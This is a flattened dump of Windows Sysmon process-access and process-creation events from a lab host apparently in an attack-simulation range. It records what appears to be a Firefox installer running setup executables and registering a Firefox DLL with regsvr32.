13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+57f3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+1eeb|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 154100x800000000000000016134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.920{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXE"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Mozilla Firefox\AccessibleMarshal.dll"C:\Program Files\Mozilla 
Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe.\setup.exe /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.ini 10341000x800000000000000016133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.911{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 